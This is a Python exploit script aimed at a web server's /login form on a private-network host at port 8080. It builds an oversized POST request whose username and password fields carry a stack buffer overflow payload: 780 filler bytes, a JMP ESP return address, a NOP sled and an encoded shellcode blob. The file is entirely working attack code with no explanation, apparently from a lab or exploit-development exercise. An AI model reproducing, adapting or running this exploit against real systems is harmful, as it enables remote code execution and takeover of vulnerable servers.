  1. #!/usr/bin/env python
  2.  
  3. import socket
  4. import time
  5.  
  6. host = '192.168.2.19'
  7. port = 8080
  8.  
  9. def send_payload(payload):
  10. evil = "POST /login HTTP/1.1\r\n"
  11. evil += "Host: 192.168.2.19\r\n"
  12. evil += "User-Agent: Mozilla/5.0\r\n"
  13. evil += "Connection: close\r\n"
  14. evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
  15. evil += "Accept-Language: en-us,en;q=0.5\r\n"
  16. evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
  17. evil += "Keep-Alive: 300\r\n"
  18. evil += "Proxy-Connection: keep-alive\r\n"
  19. evil += "Content-Type: application/x-www-form-urlencoded\r\n"
  20. evil += "Content-Length: 17000\r\n\r\n"
  21. evil += "username=" + payload
  22. evil += "&password=" + payload + "\r\n"
  23. s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  24. connect = s.connect((host, port))
  25. s.send(evil)
  26. s.close()
  27.  
  28. shellcode = ("\xda\xc0\xbf\x6d\xc8\xba\x9a\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
  29. "\x56\x31\x7a\x18\x83\xea\xfc\x03\x7a\x79\x2a\x4f\x66\x69\x28"
  30. "\xb0\x97\x69\x4d\x38\x72\x58\x4d\x5e\xf6\xca\x7d\x14\x5a\xe6"
  31. "\xf6\x78\x4f\x7d\x7a\x55\x60\x36\x31\x83\x4f\xc7\x6a\xf7\xce"
  32. "\x4b\x71\x24\x31\x72\xba\x39\x30\xb3\xa7\xb0\x60\x6c\xa3\x67"
  33. "\x95\x19\xf9\xbb\x1e\x51\xef\xbb\xc3\x21\x0e\xed\x55\x3a\x49"
  34. "\x2d\x57\xef\xe1\x64\x4f\xec\xcc\x3f\xe4\xc6\xbb\xc1\x2c\x17"
  35. "\x43\x6d\x11\x98\xb6\x6f\x55\x1e\x29\x1a\xaf\x5d\xd4\x1d\x74"
  36. "\x1c\x02\xab\x6f\x86\xc1\x0b\x54\x37\x05\xcd\x1f\x3b\xe2\x99"
  37. "\x78\x5f\xf5\x4e\xf3\x5b\x7e\x71\xd4\xea\xc4\x56\xf0\xb7\x9f"
  38. "\xf7\xa1\x1d\x71\x07\xb1\xfe\x2e\xad\xb9\x12\x3a\xdc\xe3\x7a"
  39. "\x8f\xed\x1b\x7a\x87\x66\x6f\x48\x08\xdd\xe7\xe0\xc1\xfb\xf0"
  40. "\x71\xc5\xfb\x2f\x39\x86\x05\xd0\x39\x8e\xc1\x84\x69\xb8\xe0"
  41. "\xa4\xe2\x38\x0c\x71\x9e\x32\x9a\xba\xf6\x41\x4d\x53\x04\x46"
  42. "\x60\xff\x81\xa0\xd2\xaf\xc1\x7c\x93\x1f\xa1\x2c\x7b\x4a\x2e"
  43. "\x12\x9b\x75\xe5\x3b\x36\x9a\x53\x13\xaf\x03\xfe\xef\x4e\xcb"
  44. "\xd5\x95\x51\x47\xdf\x6a\x1f\xa0\xaa\x78\x48\xd7\x54\x81\x89"
  45. "\x72\x54\xeb\x8d\xd4\x03\x83\x8f\x01\x63\x0c\x6f\x64\xf0\x4b"
  46. "\x8f\xf9\xc0\x20\xa6\x6f\x6c\x5f\xc7\x7f\x6c\x9f\x91\x15\x6c"
  47. "\xf7\x45\x4e\x3f\xe2\x89\x5b\x2c\xbf\x1f\x64\x04\x13\xb7\x0c"
  48. "\xaa\x4a\xff\x92\x55\xb9\x83\xd5\xa9\x3f\xac\x7d\xc1\xbf\xec"
  49. "\x7d\x11\xaa\xec\x2d\x79\x21\xc2\xc2\x49\xca\xc9\x8a\xc1\x41"
  50. "\x9c\x79\x70\x55\xb5\xdc\x2c\x56\x3a\xc5\xdf\x2d\x33\xfa\x20"
  51. "\xd2\x5d\x9f\x21\xd2\x61\xa1\x1e\x04\x58\xd7\x61\x94\xdf\xe8"
  52. "\xd4\xb9\x76\x63\x16\xed\x89\xa6")
  53.  
  54.  
  55. if __name__ == '__main__':
  56. # [*] Exact match at offset 780
  57. offset = 780
  58. maxsize = 10000
  59. jmpesp = '\x33\x5D\xCA\x77'
  60. payload = 'A' * offset + jmpesp + '\x90' * 100 + shellcode + '\x90'* (maxsize - offset - 4 - len(shellcode) - 100)
  61. send_payload(payload)